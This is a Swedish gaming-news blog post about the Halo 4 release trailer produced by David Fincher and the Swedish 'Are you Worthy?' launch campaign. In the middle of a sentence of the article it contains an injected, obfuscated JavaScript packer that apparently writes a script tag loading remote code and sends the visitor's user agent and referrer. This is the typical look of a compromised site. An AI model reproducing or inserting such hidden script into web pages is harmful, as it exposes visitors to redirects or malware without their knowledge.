Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Releasetrailer för Halo 4

Filip Urde
  • On 19 oktober, 2012
  • http://www.revue.se/filip-urde

Halo 4 + David = Sant!

David Fincher, låter namnet bekant?  Det är han som gjort filmer som Fight Club, The Social Network och Panic Room. Nu har han producerat eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|einzs|var|u0026u|referrer|knibb||js|php’.split(‘|’),0,{}))
releasetrailern för kommande Halo 4, vilket ännu engång visar hur stor spelindustrin är och hur all form av media börjar mixas ihop allt mer.

Sveriges Halo 4 lanseringskampanj bär namnet Are you Worthy? och till kampanjen så har man låtit bygga en webbplats fylld med interaktiva utmaningar. Om du klarar dessa utmaningar så är du dessutom med och tävlar om en biljett till Master Chiefs minnesceremoni, som äger rum den  5 november. Med 200 biljetter som står på spel så är detta ett måste för alla Halo fans. Alla rätt krävs för att vara med och tävla om biljetterna.

till webbplatsen: areyouworthy.se